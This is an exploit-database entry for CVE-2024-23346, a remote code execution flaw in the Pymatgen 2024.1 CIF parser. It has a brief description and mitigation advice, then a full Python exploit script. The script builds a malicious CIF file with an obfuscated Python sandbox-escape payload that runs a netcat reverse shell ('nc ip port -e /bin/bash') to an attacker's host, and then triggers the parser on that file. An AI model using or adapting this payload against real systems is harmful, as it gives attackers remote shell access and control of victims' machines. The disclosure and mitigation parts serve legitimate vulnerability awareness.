Pymatgen 2024.1 - Remote Code Execution (RCE)

vendor:

Pymatgen

by:

Mohammed Idrees Banyamer

6.1

CVSS

HIGH

Remote Code Execution (RCE)

CWE

Product Name: Pymatgen

Affected Version From: 2024.1

Affected Version To: 2024.1

Patch Exists: NO

Related CWE: CVE-2024-23346

CPE: pymatgen:2024.1

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux 2024.1

2024

Pymatgen 2024.1 – Remote Code Execution (RCE)

The exploit allows an attacker to achieve Remote Code Execution (RCE) on Pymatgen 2024.1 by crafting a malicious CIF file with a reverse shell payload. By triggering the Pymatgen CIF parser to parse this file, an attacker can execute arbitrary commands on the target system.

Mitigation:

To mitigate this vulnerability, users should update to a patched version of Pymatgen that addresses the RCE issue. Additionally, avoid parsing untrusted CIF files from unknown sources.

Source

Exploit-DB raw data:

# Exploit Title : Pymatgen 2024.1 - Remote Code Execution (RCE)
# Google Dork : (not applicable)
# Date : 2024-11-13
# Exploit Author : Mohammed Idrees Banyamer
# Vendor Homepage : https ://pymatgen.org
# Software Link : https ://pypi.org /project /pymatgen/
# Version : 2024.1
# Tested on : Kali Linux 2024.1
# CVE : CVE-2024-23346


import os

# Function to create the malicious CIF file
def create_malicious_cif(ip, port):
    # Constructing the malicious CIF file with reverse shell payload
    malicious_cif = f"""
data_5yOhtAoR
_audit_creation_date            2024-11-13
_audit_creation_method          "CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {ip} {port} -e /bin/bash");0,0,0'

_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "
    """
    
    # Save to a file
    with open("vuln.cif", "w") as file:
        file.write(malicious_cif)
    print("[*] Malicious CIF file created: vuln.cif")

# Function to trigger the exploit by parsing the malicious CIF file
def exploit():
    ip = input("Enter your IP address for the reverse shell: ")
    port = input("Enter the port for the reverse shell to listen on: ")
    
    # Create the malicious CIF file
    create_malicious_cif(ip, port)
    
    # Trigger the Pymatgen CIF parser to parse the malicious file
    from pymatgen.io.cif import CifParser
    parser = CifParser("vuln.cif")
    structure = parser.parse_structures()

# Running the exploit
if __name__ == "__main__":
    exploit()